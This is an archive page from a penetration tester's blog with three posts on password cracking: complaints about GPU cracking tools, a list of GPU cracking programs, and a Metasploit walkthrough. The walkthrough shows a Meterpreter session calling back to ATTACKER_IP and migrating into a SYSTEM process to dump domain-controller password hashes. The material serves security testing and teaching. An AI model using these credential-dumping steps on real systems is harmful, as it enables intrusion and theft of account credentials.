Blog - Room362.com

Entries in password cracking (3)

Wednesday

Jul132011

GPU Cracking Complaints

Wednesday, July 13, 2011 at 10:02AM

I've been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my Go-to for allowing me to visualize the process and do some basic sorting (really wish I could search in-app). But I've been asking around on twitter some questions like Why is GPU cracking for 50k hashes faster than Rainbow Tables (most say the bottleneck is the HDD read style and speed) and many asked what all of my compalints are so I figured this would be the best place (vice multiple emails)

DISCLAIMER: I have very little crypto knowledge and even less GPU programming knowledge so I only get to complain as a user and not as someone who can actually fix the things I complain about.

Lack of LM support. I get that this is a complicated hashing algorithm, but the fact that 90% of companies still have it turned on and cracking any more than a few with Rainbow Tables is impractical unless you have a SSD raid with a GPU based cracker ($$$$$).
Lack of dictionary support. Right now the best way to crack passwords is with oclhashcat-plus since it is GPU based and supports rules, multiple hashes (hash files) and directories of hashes. However, it has a very limited list of hashes it supports (No LM, SHA1, etc..) and it doesn't support dump formats, so you need to strip the file so it just has the hash (this is more of just a bother than a gripe).
- (2a) I say 'The best way' because anything that has a key space larger than upper-alpha-numeric-32symbol (LM) is just a bit nuts to try and brute force out of the gate unless your goal is to 'crack them all'. Me as a pentester, I want to get as many as possible, as quick as possible, so this means dictionaries are the smarter option. (Maybe later I can do the straight brute if I really need / want to)
Lack of POT. For some reason every cracking app on the planet, save for JtR, thinks it's a good idea to crack the same hash multiple times. I wish even Cain would keep a secret store of all the hashes it's cracked stripped of anything unimportant (need the salt (username) sometimes) and store it in the background so that if it comes across the same hash it can say "oo oo I know this one" and auto populate it even before I start cracking. Why more cracking software writers don't do this I'll never know (would make their software seem a ton faster the more it is used)
Lack of formatting documentation (#ripshairout). Rare is the time I've found a cracking program that shows you how it wants to consume a hash. JtR is the most egregious offenders of this but they all do it. One would think people would try and make it easy for people to use their software (give examples of what shit is supposed to look like at least if you don't support standard formats)

Those are my biggest gripes that the moment. If I am wrong on any account, let me know, I would love to know of a better way to do things.

Rob Fuller | Comments Off |

tagged

cracking,

gpu,

password cracking

Sunday

May152011

Dumping Hashes on Win2k8 R2 x64 with Metasploit

Sunday, May 15, 2011 at 10:35PM

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the "The parameter is incorrect" error in meterpreter. So I've had to fall back on dropping binaries which I really don't like doing because of the added clean up and chance of getting 'caught'. Well, with a bit of migration you'll be back to passing the hash. Here is how, with a bit of the thought process first:

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12622 updated today (2011.05.15)

msf > 
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer        : DOMAINCONTROLLE
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32

meterpreter > ps

Process list
============

 PID   Name                                       Arch  Session  User                          Path
 ---   ----                                       ----  -------  ----                          ----
 0     [System Process]                                                                        
 4     System                                     x64   0                                      
 224   smss.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 324   csrss.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 364   csrss.exe                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 372   wininit.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 404   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 468   services.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 476   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 484   lsm.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 628   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 708   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 804   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 836   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 880   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 932   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 972   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 328   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1172  spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1204  Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 1252  dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 1288  dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 1316  ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 1360  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1392  vmtoolsd.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1464  wlms.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wlms\wlms.exe
 1492  dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 1572  VMUpgradeHelper.exe                        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 1896  TPAutoConnSvc.exe                          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2016  vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 872   sppsvc.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1268  WmiPrvSE.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2360  taskhost.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\System32\taskhost.exe
 2424  dwm.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\dwm.exe
 2452  explorer.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\explorer.exe
 2504  TPAutoConnect.exe                          x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 2512  conhost.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\conhost.exe
 2632  VMwareTray.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 2640  VMwareUser.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 2716  mmc.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\mmc.exe
 3052  mscorsvw.exe                               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2216  TrustedInstaller.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1932  mscorsvw.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2564  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1732  msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2992  notepad.exe                                x86   1        SITTINGDUCK\juser             C:\Windows\SysWOW64\notepad.exe
 1720  notepad.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\notepad.exe


meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful 'The parameter is incorrect' error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn't the issue, but lets do a 'getprivs' just in case:

meterpreter > getprivs    
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeMachineAccountPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeEnableDelegationPrivilege
  SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be 'SYSTEM'...

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing... Maybe it requires that we be in a 64 bit process... PID 1720 was 64 bit version of Notepad, lets try that...

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as 'SYSTEM'...

meterpreter > getsystem ...got system (via technique 1).

meterpreter > hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a 'SYSTEM' process that was already there.. 'dns.exe' PID 1288 should be good...

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter >

w00t. So I don't know why, but it seems that you have to be in a 'SYSTEM' process who's primary token (started by SYSTEM) is SYSTEM (since 'getsystem' wasn't working). I also tried this getting SYSTEM to run a 32 bit process, and was still unable to dump hashes. So next time you're on an Win2k8 R2 64 bit box, remember to migrate into a pre-existing 64bit SYSTEM process and you should be good to go.

Update on Sunday, May 15, 2011 at 7:37PM by

Rob Fuller

As Gavin points out in the comments, it is better to run the meterpreter script or post module to do hashdumping on systems. The only time this is not the case is when you are trying to get domain hashes on a domain controller. The registry does not store these hashes (as far as I know). So LSASS injection is the only route and you have to jump through the mentioned hoops.

Rob Fuller |

5 Comments |

tagged

hashes,

pwdump

Thursday

Sep172009

GPU Hash / Password Cracking

Thursday, September 17, 2009 at 9:44PM

I recently upgraded my video card and had a rough time finding programs that fit the hype of GPU password cracking, so here is what I found so that you won’t have as hard a time.

Ivan Golubev’s SHA1/MD5/MD4 cracker:
http://www.golubev.com/hashgpu.htm

Ivan Golubev’s RAR pass cracker:
http://www.golubev.com/rargpu.htm

CUDA Multiforcer (down at the time of this posting)
http://www.cryptohaze.com/bruteforcers.php

BarsWF – MD5 Cracker:
http://3.14.by/en/md5

GPU MD5 Crack: (Included in BackTrack 4 repos “gpu-md5-crack”)
http://bvernoux.free.fr/md5/index.php

Distributed Hash Cracker:
http://rpisec.net/projects/show/hash-cracker
” This is an interesting one as it has a PHP front end and is agent based, so you can use one or a dozen computers, and it will use the CPUs and GPUs available”

Pentoo Live CD with a bunch of GPU cracking goodness built in:
http://pentoo.blogspot.com/

Extreme GPU Bruteforcer (39.95 Euro)
http://www.insidepro.com/eng/egb.shtml

ElcomSoft Distributed Password Recovery ($599 for 1st lvl – 20 hosts)
http://www.elcomsoft.com/edpr.html

ax0n from http://www.h-i-r.net/ shot me an email stating that BT4 has some more GPU tools added to it:

Just FYI, BT4 also added some CUDA GPU cracking functionality a while
back ago. IIRC It includes Pyrit and CUDA-Multiforcer -- maybe a few
others. Pyrit is a cuda-enabled WPA-PSK cracker that you may also be
interested in.

Pyrit - WPA/PSK - WPA2/PSK GPU cracker
http://code.google.com/p/pyrit/

Rob Fuller |

4 Comments |

tagged

cuda,

password cracking,

references in

Hacking